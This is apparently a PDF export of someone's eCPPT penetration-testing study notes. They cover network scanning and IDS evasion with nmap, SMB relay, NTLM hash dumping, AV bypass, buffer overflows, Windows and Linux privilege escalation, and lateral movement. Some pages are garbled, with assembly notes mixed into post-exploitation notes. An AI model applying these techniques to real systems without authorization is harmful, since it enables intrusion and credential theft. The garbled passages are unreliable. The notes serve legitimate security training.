15/04/2025 11:45 eCPPT Certification

📕
eCPPT Certification
Aucun accès
PowerShell for Pentesters
Client-Side attacks
Web Application Penetration Testing
Network Penetration testing
System Security & x86 Assembly Fundamentals
Exploit Development: Buffer Overflows
Privilege Escalation
Lateral Movement & Pivoting
Active Directory Penetration Testing
Command & Control (C2/C&C)

👉 Attack Defense Site → PA Dashboard

Pentest Reports

PowerShell for Pentesters

Client-Side attacks R 1 commentaire

Web Application Penetration Testing

[Link] 1/77
15/04/2025 11:45 eCPPT Certification

Network Penetration Testing

Active Information Gathering

Network mapping - Host Discovery - Port Scanning - Service Detection & OS - Detection

Active information gathering refers to the phase of assessment where the tester
actively interacts with the target system or network to collect data and identify
potential vulnerabilities

[Link] 2/77
15/04/2025 11:45 eCPPT Certification

Networking fundamentals
Network protocols ensure that different computer system, using different
hardware and sowftware can communicate with each other.
The packets are information trasferred between network computers.

Packets structure

Header → ensure that the receiving host can correctly interpret the payload and
handle the overall communication (ex. header advice that TCP transaction)
Payload → is the actual information (ex. email message, URL, etc…)

OSI Model - Open System Interconnection is conceptual framework that

standardizes the functions of the communication or computer system into seven
abstraction layer.

Network Layer - [OSI n.3]

[Link] 3/77
15/04/2025 11:45 eCPPT Certification

Network layer is responsible for logical addressing, routing and forwarding data
packets between devices across different networks.

🥅 GOAL
Determine the optimal path for data to travel from the source to the
destination, even if the devices are on separate network

Network layer protocols:

• IP
◦ IPv4 → the most widely used version of IP - 32-bit addresses
◦ IPv6 → 128-bit addresses
• ICMP - Internet Control Message Protocol
◦ Used for error reporting and diagnostics. ICMP include ping

Network Layer
IP Header Format
IP protocol defines many different fields in the packet header.

Transport Layer
TCP - LAYER 4

[Link] 4/77
15/04/2025 11:45 eCPPT Certification

• Connection-Oriented:
TCP establishes a connection between the sender and receiver before any
data is exchanged. This connection is a virtual circuit that ensures reliable
and ordered data transfer.
• Reliability:
TCP guarantees reliable delivery of data. It achieves this through
mechanisms such as acknowledgments (ACK) and retransmission of lost or
corrupted packets. If a segment of data is not acknowledged, TCP
automatically resends the segment.
• Ordered Data Transfer:
TCP ensures that data is delivered in the correct order. If segments of data
arrive out of order, TCP reorders them before passing them to the higherlayer
application.

🔎 TCP top PORT

21 → FTP
22 → SSH
25 → SMTP
80 → HTTP
110 → POP3
443 → HTTPS

3306 → MySQL
3389 → RDP
8080 → HTTP alternative port
27017 → MongoDB

UDP
• Used for Real-Time Applications:
UDP is commonly used in real-time applications where low latency is crucial,
such as audio and video streaming, online gaming, and voice-over-IP (VoIP)
communication.
• Simple and Stateless:
UDP is a stateless protocol, meaning that it does not maintain any state
information about the communication.

[Link] 5/77
15/04/2025 11:45 eCPPT Certification

• Each UDP packet is independent of previous or future packets.

Network Mapping Objectives

• Discovery of Live Hosts:
Identifying active devices and hosts on the network. This involves
determining which IP addresses are currently in use.
• Identification of Open Ports and Services:
Determining which ports are open on the discovered hosts and identifying
the services running on those ports. This information helps pen testers
understand the attack surface and potential vulnerabilities.
• Network Topology Mapping:
Creating a map or diagram of the network topology, including routers,
switches, firewalls, and other network infrastructure elements. Understanding
the layout of the network assists in planning further penetration testing
activities.
• Operating System Fingerprinting:
Determining the operating systems running on discovered hosts. Knowing
the operating system helps pentesters tailor their attack strategies to target
vulnerabilities specific to that OS.
• Service Version Detection:
Identifying specific versions of services running on open ports. This
information is crucial for pinpointing vulnerabilities associated with particular
service versions.
• Identifying Filtering and Security Measures:
Discovering firewalls, intrusion prevention systems, and other security
measures in place. This helps pentesters understand the network's defenses
and plan their
approach accordingly.

Host Discovery
Host discovery is a crucial phase to identify live hosts on a network before
further exploration and vulnerability assessment.
Techniques:

[Link] 6/77
15/04/2025 11:45 eCPPT Certification

• Ping Sweeps (ICMP Echo Requests)

Sending ICMP Echo Requests (ping) to a range of IP addresses to identify live
hosts. This is a quick and commonly used method
• ARP Scanning
Using Address Resolution Protocol (ARP) requests to identify hosts on a local
network. ARP scanning is effective in discovering hosts within the same
broadcast domain
• TCP SYN Ping
Sending TCP SYN packets to a specific port (often port 80) to check if a host
is alive. If the host is alive, it responds with a TCP SYN-ACK. This technique is
stealthier than ICMP ping.
• UDP Ping
Sending UDP packets to a specific port to check if a host is alive. This can be
effective for hosts that do not respond to ICMP or TCP probes.
• TCP ACK Ping
Sending TCP ACK packets to a specific port to check if a host is alive. This
technique expects no response, but if a TCP RST (reset) is received, it
indicates that the host is alive

[Link] 7/77
15/04/2025 11:45 eCPPT Certification

• SYN-ACK Ping
Sending TCP SYN-ACK packets to a specific port to check if a host is alive. If a
TCP RST is
received, it indicates that the host is alive.

Ping Sweeps
Ping sweep is a network scanning technique used to discover live hosts
(computers, servers, or other devices) within a specific IP address range on a
network.

💡 IDEA
Send a series of ICMP Echo Request (Ping) message to a range of IP
and observe the responses to determine with one are active or
reachable

[Link] 8/77
15/04/2025 11:45 eCPPT Certification

## You can perform it via ping or fping ## fping send ICMP Echo
Request packet fping -a -g [Link]/24 ## -a = alive ## -g =
generate target list ## in order to redirect standard error output
to dev/null use this command fping -a -g [Link]/24 2>/dev/null

Port Scanning Nmap

With -Pn option we will skip the host discovery

In order to scan all TCP port use -p-

🚨 Expensive time command

[Link] 9/77
15/04/2025 11:45 eCPPT Certification

Output of: nmap -Pn -p- <IP>

If the port is not open we will receive filtered state

Here I can understand that the 80 port is behind a firewall

Service Version & OS Detection

First of all scan the subnet /24
nmap -sn [Link]/24

[Link] 10/77
15/04/2025 11:45 eCPPT Certification

Hunt for target-1

Nothing important.

Now let we execute the same but -sV option to have more info

[Link] 11/77
15/04/2025 11:45 eCPPT Certification

In order to output the OS detection use -O option

We can also do it more aggressive with --osscan-guess

[Link] 12/77
15/04/2025 11:45 eCPPT Certification

To understand version detection use --version-intesity <level> (level from

0 to 9[all probes] )

Nmap Scripting Engine (NSE)

Library of already created script are at ls -al /usr/share/nmap/scripts
folder

As an example script for mysql or http script engine ([Link])

[Link] 13/77
15/04/2025 11:45 eCPPT Certification

So we can use it with nmap

nmap -sS -sV -sC -p- <IP> → -sC: equivalent to --script=default

🚨 Con questi default script non vengono eseguiti script intrusivi come
ad esempio [Link] in quanto bruteforce

[Link] 14/77
15/04/2025 11:45 eCPPT Certification

To specify script use --script=mongodb-info

🚨 Dato che ci sono altri servizi come memcached e ftp.

Vedo e lanciono gli script inerenti solo a quel servizio!

🚨 REMEMBER that we can specify two or more nse with “,” --

script==ftp,memcached and also * to load more scripts

Firewall/IDS Evasion

[Link] 15/77
15/04/2025 11:45 eCPPT Certification

The -sA send ACK packet to the host. This can be used to understand if the
state is open on filtered. Filtered means that probably there is a Firewall that
filter between our machine and target.

If we receive state = unfiltered it means that no firewall interfere with us.

📌 State = Filtered → firewall between us and target

State = unfiltered → nothing between us and target

[Link] 16/77
15/04/2025 11:45 eCPPT Certification

💡 In order to evade IDS/IPS we need to fragment packet

Use option -f
(Like Untitled)

or
--data-length to append random data to send packets and -
D option to Cloak a scan with decoys (in fact here we have ip .4 ,
.2 and so on)
Example of --data-length = 200

nmap -Pn -sS -sV -p445,3389 -f --data-length 200 -D

[Link],[Link] [Link]

Optimize Nmap Scans

[Link] 17/77
15/04/2025 11:45 eCPPT Certification

• --host-timeout <second> option help to go ahead to next target after

time if no answer was received.

🚨 Ricorda che questa opzione potrebbe non matchare cose

importanti in quanto alcuni host potrebbero metterci più
tempo per rispondere.
Usare con precauzione!

• -T<1-4> with this option the ping discovery will be lower (1) to faster
(4).

Nmap Output Formats

DEMO:

Enumeration

[Link] 18/77
15/04/2025 11:45 eCPPT Certification

After host discovery and port scanning phase the next logical phase is
Enumeration
The goal of service enumeration is to gather additional, more
specific/detailed information about the hosts/systems on a network and
the services running on said hosts.
Information like account names, shares, misconfigured services and
so on.

SMB & NetBIOS Enumeration

NetBIOS is an API and a set of network protocols for providing
communication services over a local network.
It’s used primarly to allow applications on different computers to find and
interact with each other on a network
• Name Service (NetBIOS-NS)
Allow computers to register, unregister, and resolve names in local
network.
• Datagram Service (NetBIOS-DGM)
Supports connectionless communciation and broadcasting
• Session Service (NetBIOS-SSN)
Support connection-oriented communication for more reliavle data
transfers

[Link] 19/77
15/04/2025 11:45 eCPPT Certification

📌 PORT Used
- 137 Name Service
- 138 Datagram Service
- 139 Session Service

SMB is a network file sharing protocol that allows computers on a network

to share files,
printers, and other resources. It is the primary protocol used in Windows
networks for these
purposes.

📌 PORT
- 445 SMB traffic
- 139 when operating with NetBIOS

DEMO: Aucun accès

💡 Questo lab utile per pivoting. Una volta che troviamo servizio
esposto sulla macchina X attraverso revers shell e socks4a
riusciamo ad accedere alla seconda macchina Y pingabile solo
tramite la X

SNMP Enumeration
SNMP (Simple Network Management Protocol) is a widely used protocol
for monitoring and managing networked devices, such as routers,
switches, printers, server and more.
It allows network administrators to query devices for status information,
configure certain setting, and receive alerts or traps when specific event
occur

[Link] 20/77
15/04/2025 11:45 eCPPT Certification

📌 PORT
- 161 UDP SNMP queries
- 162 UDP SNMP traps (notification)

⚠️ SNMP enumeration in penetration testing involves querying

SNMPenabled
devices to gather information useful for identifying potential
vulnerabilities, misconfigurations, or points of attack.

● Identify SNMP-Enabled Devices:

Determine which devices on the network have SNMP enabled
and whether they are vulnerable to information leakage or
attacks.
● Extract System Information:
Collect system-related data like device names, operating
systems, software versions, network interfaces, and more.
● Identify SNMP Community Strings:
Test for default or weak community strings, which can grant
unauthorized access to device information.
● Retrieve Network Configurations:
Gather information about routing tables, network interfaces, IP
addresses, and other network-specific details.
● Collect User and Group Information:
In some cases, SNMP can reveal user account information and
access permissions.
● Identify Services and Applications:
Find out which services and applications are running on the
target devices, potentially leading to further attack vectors.

DEMO: Aucun accès

💡 FLOW = nmap (scan rete) → nmap script → find users →

hydra/crackmapexec/psexec → metasploit reverse shell →
access

[Link] 21/77
15/04/2025 11:45 eCPPT Certification

Linux Service Enumeration

DEMO: Aucun accès

Windows Exploitation
An SMB relay attack is a type of network attack where an attacker
intercepts SMB (Server Message Block) traffic, manipulates it, and relays it
to a legitimate server to gain unauthorized access to resources or perform
malicious actions.

📌 SMB refer most to Windows Network due to SMB file sharing

usage!

SMB Relay Attack - how it works?

• Interception:
The attacker sets up a man-in-the-middle position between the client
and the server. This can be done using various techniques, such as ARP
spoofing, DNS poisoning, or setting up a rogue SMB server.
• Capturing Authentication:
When a client connects to a legitimate server via SMB, it sends
authentication data. The attacker captures this data, which might
include NTLM (NT LAN Manager) hashes.
• Relaying to a Legitimate Server:
Instead of decrypting the captured NTLM hash, the attacker relays it to
another server that trusts the source. This allows the attacker to
impersonate the user whose hash was captured.
• Gain Access:
If the relay is successful, the attacker can gain access to the resources
on the server, which might include sensitive files, databases, or
administrative privileges. This access could lead to further lateral
movement within the network, compromising additional systems.
DEMO: Aucun accès
DEMO: Aucun accès

[Link] 22/77
15/04/2025 11:45 eCPPT Certification

System
Linux
Security
Exploitation
& x86 Assembly Fundamentals
DEMO: Aucun accès
CPU Architecture
A CPU (Central Processing Unit) is often referred to as the brain of a computer,
responsible for executing instructions and performing calculations.
Post Exploitation
CPU instructions are represented in hexadecimal (HEX) format
MachineThecode
Windows OS stores
is translated intohashed user account
ASM (Assembly password locally in the SAM
Language).
(Security
Assembly Account
language Manager)programming
is a low-level database. language that is closely related
to the machine code instructions
SAM (Security of a specific
Account Manager) CPU architecture
is a database file that is responsible for
managing
user accounts and passwords on Windows. All user account passwords
stored in
the SAM database are hashed.

💡 In modern versions of Windows, the SAM database is encrypted

with a syskey.

NTLM HASH - (NTHash)

NTLM is a collection of authentication protocols that are utilized in
Windows to facilitate
authentication between computers. The authentication process involves
using a valid
username and password to authenticate successfully.

• Control Unit (CU): The control unit is responsible for coordinating and
Dumping & Cracking NTLM Hashes
controlling the operations of the CPU.
We can dump ntlm hash with:
• Arithmetic Logic Unit (ALU): The ALU is the component responsible for
• mimikatz
performing arithmetic and logical operations. Perform basic operation like
add,•sub, mult and AND,OR,NOT.
Meterpreter hashdump (Kiwi)
After crack them with:
• Hashcat
• John the ripper
DEMO: Aucun accès
DEMO: Aucun accès

[Link] 23/77
15/04/2025 11:45 eCPPT Certification

• Registers:
BypassingRegisters are small, high-speed storage location within the CPU
AV
used to store data temporarily during processing.
Bypass types
Common AV using combo ofinclude:
of registers reverce_tcp (to download file on target
machine and obtain access) veil and upx in order to create malicious
Program Counter (PC): Holds the memory address of the next
◦ payload and then compress executable file.
instruction to be fetched
DEMO: Aucun accès
◦ Instruction Register (IR): Holds the currently executing instruction
◦ Accumulator: Store the result of arithmetic and logic operations
◦ General-Purpose Registers: Used to store intermidiate values and
operands during instruction execution

CPU has its own ISA (Istruction set architecture). The ISA is the set of instructions
that a programmer must understand and use to write a program correctly for
that specific CPU and machine.

Registers
Registers are located withing the CPU and are used to temporarily hold data that
is being processed or manipulated by the CPU.

General Purpose Registers

GPR are used to store data temporarily during program execution.
Example of general-purpose registers include:

Generate data - EAX - Accumulator Register: Accumulator Register

manipulation and - EBX - Base Register: Used as a pointer to data
arithmetic operations - ECX - Counter Register: Counter used in shift/rotate instruction and loop
- EDX - Data Register: Used in aritmetic operation and I/O
String manipulation - ESI - Source Index Register: Used as a pointer to a source in stream operation
operations - EDI - Destination Index Register: Used as a pointer to a destination in stream
operation
Managing the stack - ESP - Stack Pointer Register: Pointer to the top of the stack
- EBP - Base Pointer Register: Pointer to the base of the slack
Increased addressable - RAX:
memory space - RBX:
- RCX:
- RDX:

[Link] 24/77
15/04/2025 11:45 eCPPT Certification

💡 In the 8-bit naming convention is divided into L (low byte) and H (high
byte)
In the 16-bit naming convention combines the L and the H, and replace
it with an X
In the 32-bit representation, the register acronym/name is prefixed with
an E, meaning extended.
Whereas, in the 64-bit representation, the E is replaced with the R.

Instruction Pointer - EIP

The Instruction Pointer controls the program execution by storing a pointer to
the address of the next instruction that will be executed.

Process Memory
Process Memory is a fundamental aspect of operating systems, responsible for
organizing and managing memory resources for running programs.
Process memory is typically divided into segments:
• Code segment: Contains the executable code of the program
• Data segment: Stores initialized data, such as global variables and static
variables.
• BSS segment: Contains uninitialized data, initialized to zero during program
execution
• Heap segment: Dynamically allocated memory for program data structures
• Stack segment: Stores function call frames, local variables, and function
parameters.

[Link] 25/77
15/04/2025 11:45 eCPPT Certification

Understanding the Stack

The stack is data structure in computer science and plays a crucial role in the
execution of programs. It’s a region of memory.
LIFO - Last In First Out → meaning that the last item pushed into the stack is the
first one to be popped off
The stack pointer points to the top of the stack, indicating the location in
memory where the next item will be pushed or popped.

Heap → start form lower addresses while

Stack → start from the end of the memory

Push is an operation that adds an element to the top of the stack.

- increment stack pointer
- store the element
Pop is an operation that removes the top element from the stack.
- Access the top element
- Decrement the stack pointer

[Link] 26/77
15/04/2025 11:45 eCPPT Certification

💡 Calculator online
Decimal to Hex Converter

Example - PUSH

PUSH E → ESP - 4

Example 2 - PUSH

PUSH 1 → ESP = HEX - 4

Example 3 - POP

[Link] 27/77
15/04/2025 11:45 eCPPT Certification

POP

Stack Frames
The Stack Frames is a data structure used by the CPU and the operating system
to manage function calls and execution flow within a program.

Functions contain tow important components, the prologue and the epilogue.
The prologue prepare the stack to be used. (Like a bookmark)
The epilogue resets the stack to the prologue settings.
When the subroutine ends, two things happen:
• The program receives the parameters passed from the subroutine.
• The Instruction Pointer (EIP) is reset to the location at the time of the initial
call.

Example

[Link] 28/77
15/04/2025 11:45 eCPPT Certification

💡 Syscall
[Link]

DEMO:

[Link] 29/77
15/04/2025 11:45 eCPPT Certification

To run this program we need to

## convert it into .o file nasm -f elf32 -o hello_world.o [Link] ##

create executable ld -m elf_i386 -o hello_world hello_world.o ## then
you can run it ./hello_world

[Link] 30/77
15/04/2025 11:45 eCPPT Certification

Exploit Development: Buffer Overflows

The term buffer is loosely used to refer to any area in memory where more that
one piece of data is stored.
An overflow occurs when we try to fill more data than the buffer can handle.

Example

int main(int argc, char** argv) { argv[1] =

(char*)"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; char buffer[10];
strcpy(buffer, argv[1]); } ## to compile this code use gcc test.c -o
test

When we execute it we obtain this error

If we build the code with

gcc -fno-stack-protector test.c -o test

In this case we will obtain

💡 In order to fix this we need to notice the number of character that we

insert
Use strncpy (n used to notice the size)

Finding Buffer Overflow

[Link] 31/77
15/04/2025 11:45 eCPPT Certification

💡 Vulnerable functions:
○ strcpy
○ strcat
○ gets / fgets
○ vsprintf
○ printf
○ Memcpy

BOF Hunting Techniques

• When a crash occurs, be prepared to hunt for the vulnerability with a
debugger (the most efficient and well-known technique).
• Some companies use cloud-fuzzing to brute-force crashing (using filebased
inputs). Whenever a crash is found, it is recorded for further
analysis.
• A dynamic analysis tool like a fuzzer or tracer, which tracks all executions
and the data flow, can help in finding problems/errors/crashes.

Fuzzing
Fuzzing is a software testing technique that provides invalid data.
Input can be in any form such as:
• Command line
• Parameters
• Network data
• File input
• Databases
• Shared memory regions
• Keyboard/mouse input
• Environment variables
Fuzzing aims to identify such vulnerabilities by systematically testing various
input combinations to see if they cause the program to crash or exhibit
unexpected behavior.

[Link] 32/77
15/04/2025 11:45 eCPPT Certification

💡 SPIKE

DEMO: Aucun accès

Structured Exception Handling (SEH)

SEH is a mechanism employed by the Windows operating system to manage
exceptions or errors that occur during program execution.
Come funziona?
• Rilevazione dell'eccezione: Quando si verifica un'eccezione (ad esempio, un
tentativo di accesso a un'area di memoria non valida), il sistema operativo
Windows interrompe l'esecuzione normale del programma e cerca un
gestore di eccezioni. Le eccezioni possono essere generate dal processore,
dal sistema operativo o dall'applicazione stessa.
• Stack di gestori di eccezioni: Ogni thread ha un proprio stack di gestori di
eccezioni. Quando si entra in un blocco di codice protetto da SEH, un nuovo
gestore di eccezioni viene aggiunto in cima a questo stack. Questo gestore
contiene informazioni su come gestire una particolare eccezione e dove
continuare l'esecuzione del programma dopo che l'eccezione è stata gestita.
• Gestione dell'eccezione: Se si verifica un'eccezione, Windows percorre lo
stack dei gestori di eccezioni, iniziando dall'ultimo gestore aggiunto,
cercando un gestore che può gestire il tipo specifico di eccezione. Quando
trova un gestore appropriato, Windows passa il controllo a quel gestore, che
può:
◦ Gestire l'eccezione, correggendo il problema o registrando l'errore.
◦ Terminare l'applicazione se l'eccezione è fatale.
◦ Ignorare l'eccezione e continuare l'esecuzione normale, anche se questa
non è una pratica raccomandata.
• Pulizia: Dopo che un'eccezione è stata gestita, il sistema operativo può
eseguire operazioni di pulizia necessarie, come il ripristino dello stato del
sistema o la liberazione delle risorse.

DEMO: Aucun accès

[Link] 33/77
15/04/2025 11:45 eCPPT Certification

Privilege Escalation
Privilege Escalation is a critical concept in penetration testing and red teaming.
It refers to the process of gaining elevated access or additional privileges in a
computer system or network.
Privilege escalation involves exploiting vulnerabilities or misconfigurations to gain
access to resources that are typically restricted to users with higher privileges.

Privilege escalation can be divided into:

1. Vertical → the attacker is able to move from a lower privileged user to a
higher privileged user
2. Horizontal → the attacker keeps the same set or level of privileges, but
assumes the identity of a different user

Privilege escalation with PowerUp

PowerUp is a popular tool used in the context of Windows Privilege Escalation
It is a part of the PowerSploit framework, a collection of PowerShell-based tools
designed for off sec task.
PowerUp automates the process of scanning a Windows system for potential
misconfigurations, vulnerabilities, and security flaws that could lead to privilege
escalation.
Such as:
• Insecure Service Configuration: Services running with elevated privileges
(e.g., SYSTEM) that are vulnerable to exploitation due to weak permissions or
other security issues
• Unquoted Service Paths: Services with unquoted paths that can be exploited
by placing a malicious executable in a strategic location
• Weak Registry Permissions: Registry keys with insecure permissions that
allow unauthorized modification, leading to privilege escalation
• Vulnerable Scheduled Tasks: Scheduled tasks that can be manipulated to run
with elevated privileges.
• Insecure File Permissions: Files or directories with weak permissions that
could be exploited to execute code with higher privileges.

[Link] 34/77
15/04/2025 11:45 eCPPT Certification

• Insecure DLL Search Orders: Exploitable DLL search orders that allow DLL
hijacking to gain elevated privileges.
• Stored Credentials: Credentials stored insecurely in registry keys, files, or
other locations.

PowerUp.ps1 PowerShellMafia/PowerSploit
<#

PowerUp aims to be a clearinghouse of common Windows privilege escalati

on
vectors that rely on misconfigurations. See [Link] for more informat
ion.

Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

#>

#Requires -Version 2
… plus
master • PowerShell

DEMO: Aucun accès

DEMO: Aucun accès

Unattended installation file

Windows can automate a variety of repetitive tasks, such as the mass rollout or
installation of Windows on many systems.
This is typically done through the use of the Unattended Windows Setup utility,
which is used to automate the mass installation/deployment of Windows on
systems.
The Unattended Windows Setup utility will typically utilize one of the following
configuration files that contain user account and system configuration
information:
• C:\Windows\Panther\[Link]
• C:\Windows\Panther\[Link]

[Link] 35/77
15/04/2025 11:45 eCPPT Certification

Windows Credential Manager

Windows Credential Manager is a built-in feature in Microsoft Windows that
allows users to securely store and manage their credentials, such as usernames,
passwords, and other login information, for various services, applications,
websites, and network resources.

💡 cmdkey is a command-line utility in WIndows that interact with

Windows Credential Manager

Add Credentials
List Credentials
Delete Credentials

DEMO: Aucun accès

PowerShell History
DEMO: Aucun accès

Exploiting Insecure Service Permissions

Windows Services are background processes that run in the Windows operating
system, often with elevated privileges.
Services can be configured to start automatically, manually or be triggerd by
specific events.
Insecure service permissions occur when a Windows service has
misconfigurations in its access control settings, allowing unprivileged users to
modify the service or its associated components.
Common permission misconfigurations include:
• Full Control or Write Permissions: If a service's configuration can be
modified
by an unprivileged user, this creates a security risk. An attacker could change
the service's properties, such as its executable path, to execute arbitrary code
with elevated privileges.

[Link] 36/77
15/04/2025 11:45 eCPPT Certification

• Unquoted Service Paths: If a service's executable path contains spaces and is

not properly enclosed in quotes, an attacker can place a malicious executable
in a specific location along the path, causing it to be executed when the
service starts.
Steps:
1. Idenitfy VulNerable Services
The attacker enumerates the Windows services on the target system to find
those with insecure permissions.
Tools like PowerUp, AccessChk, or Metasploit can be used to automate this
process.
2. Analyze Service Permissions
The attacker checks the permissions on each service to determine if they
allow unauthorized modifications (ACL - Access Control Lists)
3. Modify the Service Configuration
If a service has insecure permissions, the attacker can modify its properties.
4. Restart the Service
Once the service configuration has been modified, the attacker restarts the
service.

Service Binary Replacement

1. Identify a Service with Insecure Permissions
Attackers first find a service where they have write access to the service's
executable file or its directory.
2. Replace the Executable
The attacker replaces the existing service executable with a malicious
executable. The malicious executable might contain a payload to create
backdoors, escalate privileges, or perform other unauthorized actions.
3. Restart the Service
When the service is restarted, it runs the malicious executable, allowing the
attacker to execute their payload with the privileges of the service, often
resulting in privilege escalation.

DEMO: Aucun accès

Privilege Escalation via Registry AutoRuns

[Link] 37/77
15/04/2025 11:45 eCPPT Certification

Registry Autoruns are a common vector for privilege escalation in Windows

Systems.
The technique involves exploiting registry keys that are used to configure
programs or scripts to automatically run when certain events occur.
Attacker can leverage insecure configuration or weak permission in these registry
keys to execute malicious code with elevated privileges

💡 Common Autorun scenarion:

• System Startup: Programs configured to start when the system
boots.
• User Login: Programs that run when a specific user logs in.
• Service Initialization: Services that start with the system and
potentially with
elevated privileges.

Steps:
1. Identify Vulnerable Registry Autoruns
The attacker identifies registry keys that control autoruns and checks their
permissions. Tools like AccessChk or PowerUp can help locate insecure keys.
2. Exploiting Weak Permissions
If the attacker has write access to a registry key used for autoruns, they can
modify the key's value to point to a malicious executable or script. This
executable will then run with the permissions of the original autorun process,
often leading to privilege escalation.
3. Achieving Privilege Escalation
When the system restarts or the target user logs in, the malicious code runs
with elevated permissions, granting the attacker higher privileges or allowing
them to perform unauthorized actions.

[Link] 38/77
15/04/2025 11:45 eCPPT Certification

💡 Typical Registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

DEMO: Aucun accès

Access Token Impersonation

Windows access tokens are a core element of authentication process on
WIndows and are created and manged by the Local Security Authority Subsystem
Service - LSASS
A Windows access token is responsible for identifying and describing the security
context of a process or thread running on a system.
Access tokens are generated by the [Link] process every time a user
authenticates successfully and includes the identity and privileges of the user
account associated with the thread or process. This token is then attached to the
[Link] process, after which all child processes started by a user will inherit a
copy of the access token from their creator and will run under the privileges of
the same access token.

[Link] 39/77
15/04/2025 11:45 eCPPT Certification

💡 Requered privileges for a successful impersonation attack

- SeAssignPrimaryToken: Allows a process to assign the primary token

for a process.
This privilege is critical for creating processes with specific user security
contexts.
- SeCreateToken: The SeCreateToken privilege allows a process to
create new
security tokens, typically used for authentication and identity
representation.
- SeImpersonatePrivilege: The SeImpersonatePrivilege allows a process
to
impersonate other users' security tokens. This privilege is crucial for
operations
where a service or process needs to perform tasks on behalf of a
different user.

DEMO: Aucun accès

Juicy Potato
Juicy Potato is a Windows Privilege escalation exploit that leverages specific
vulnerabilities related to DCOM (Distributed Component Object Model)
The exploit leverages Windows' capability to create
LocalService/NetworkService tokens and then use those tokens to impersonate
higher-privilege accounts like SYSTEM

How it Works?
Juicy Potato exploits a vulnerability in how DCOM processes and services
interact, particularly when creating tokens. It does this by leveraging the
LocalService token to get access to a higher-privilege context.
The exploit creates a fake COM server and registers it with a specific CLSID. This
allows the attacker to direct requests to their malicious COM server, enabling
them to manipulate the token used for that process.

[Link] 40/77
15/04/2025 11:45 eCPPT Certification

Once the malicious COM server is registered and the process initiated, Juicy
Potato can create a LocalService token and then manipulate it to impersonate a
high-privilege context like SYSTEM.

Bypassing UAC with UACMe

User Account Control (UAC) is a Windows security feature introduced in
Windows Vista that is used to prevent unauthorized changes from being made to
the operating system.

UAC is used to ensure that changes to the operating system require approval
from the administrator or a user account that is part of the local administrators
group.

🔥 In order to successfully bypass UAC, we will need to have access to an

user account that is a part of the local administrators group on the
Windows target system.

UACMe is an open source, robust privilege escalation tool that can be used to
bypass Windows UAC by leveraging various techniques.
UACME
hfiref0x • Modifié le il y a 1 heure

DEMO: Aucun accès

DLL Hijacking

[Link] 41/77
15/04/2025 11:45 eCPPT Certification

DLL hijacking is a privilege escalation technique, where an attacker manipulates

the way Windows applications load Dynamic Link Libraries (DLLs) to execute
malicious code with elevated privileges.

💡 By manipulating the DLL loading process, an attacker can inject

malicious code into an application, potentially leading to privilege
escalation.

Methodology
1. Identify Vulnerable Applications
a. Determine Privileged Application: Identify application or services that
run with elevated privileges
b. Analyze DLL Dependencies: Examine the application’s dependency on
specific DLL and check for cases where these DLLs may not be found in
their expected location.
2. Examine the DLL search order
a. Understand Default Search Order: Windows has a predefined order for
searching for DLLs. It generally starts with the application's directory,
followed by the system directories, and then other system-defined
paths.
b. Identify Potential Insertion Points: Determine where in the search order
an attacker might place a DLL so that it gets loaded by the application.
Common locations include:
i. The application's current working directory
ii. The System32 or SysWOW64 directories.
iii. Directories listed in the PATH environment variable.
iv. Other directories included in the search order.

[Link] 42/77
15/04/2025 11:45 eCPPT Certification

3. Inject a Malicious DLL

a. Create a Malicious DLL: The attacker creates a DLL with the same name
as a DLL that is missing or not found by the application. This DLL contains
the attacker's code or payload.
b. Place the Malicious DLL in a Strategic Location: Place the DLL in a
location where the application is likely to look for it (search order). The
goal is for the application to find and load the malicious DLL instead of
the legitimate one.

DEMO: Aucun accès

DEMO: Aucun accès

Exploiting SUID Binaries

Linux provide with specialized permissions that can be utilized in specific
situation (instead of classic read, write and execute).
One of this access permissions is the SUID permission.

💡 When applied, this permission provides users with the ability to execute
a script or binary with the permissions of the file owner as opposed to
the user that is running the script or binary.

SUID permissions are typically used to provide unprivileged users with the ability
to run specific scripts or binaries with “root” permissions

Example of SUID permission

DEMO: Aucun accès +

DEMO: Aucun accès

[Link] 43/77
15/04/2025 11:45 eCPPT Certification

Shared Library Injection

Shared Libary is a file that contains code and data that can be loaded by multiple
processes at runtime.

💡 Shared library injection involves injecting a custom shared library into a

running process to execute arbitrary code or manipulate the process's
behavior.

Methodology
1. Identify a Target Process
a. The attacker identifies a running process with elevated privileges, such as
a system service, daemon, or application running as root.
2. Create a Malicious Shared Library
a. The attacker creates a shared library containing the code they wish to
executed. This code include arbitrary payload, backdoor etc…
3. Inject the Shared Library into the Target Process
a. Several technique like:
Using LD_PRELOAD: This environment variable specifies a shared library
to
be loaded before any other libraries. By setting this variable, an attacker
can
preload a malicious shared library into a process.
Process Control (ptrace): The ptrace system call allows a process to
control
another process, typically used for debugging. Attackers can use ptrace
to
inject code into a running process, causing it to load a malicious shared
library.

DEMO: Aucun accès

[Link] 44/77
15/04/2025 11:45 eCPPT Certification

Lateral Movement & Pivoting

Hint for Lateral Movement and Pivoting

Lateral Movement
It is the process of moving from one compromised system to other systems
withing a network.

💡 The primary goal of lateral movement is to escalate access and

privileges, effectively broadening the attacker's control within the
network.

Pivoting
It involves using a compromised system as a “stepping store” to access other
systems or network segments that are otherwise inaccessible from the attacker’s
initial access.

Lateral Movement VS Pivoting

[Link] 45/77
15/04/2025 11:45 eCPPT Certification

Windows Lateral Movement Techniques

Here is an outline of the various Windows lateral movement techniques:

Credential-Based Lateral Movement

Credential-based lateral movement refers to techniques attackers use to move
laterally within a network by obtaining, reusing, or exploiting credentials.

💡 Credentials can be username and password, hashes or Kerberos

Tickets

[Link] 46/77
15/04/2025 11:45 eCPPT Certification

Technique Description Tool

Pass the Hash (PtH) Attacker use stolen NTLM hash Mimikatz
values to authenticate with other Metasploit
systems without knowing the Impacket (e.g.,
plaintext password [Link])
CrackMapExec.
Pass-the-Ticket (PtT) Attackers use captured Kerberos Mimikatz
tickets to authenticate and access Rubeus
resources across a network. Kerberos
Credential Reuse Attackers use captured plaintext Mimikatz
passwords or hashes to gain Metasploit
access to additional systems CrackMapExec
Impacket
Golden / Silver Attackers forge Kerberos tickets Mimikatz
Tickets to gain long-term or specific Rubeus
access to
domain resources.

Windows Remote Management Protocols

Remote management protocols allowing administrators to manage systems
remotely,
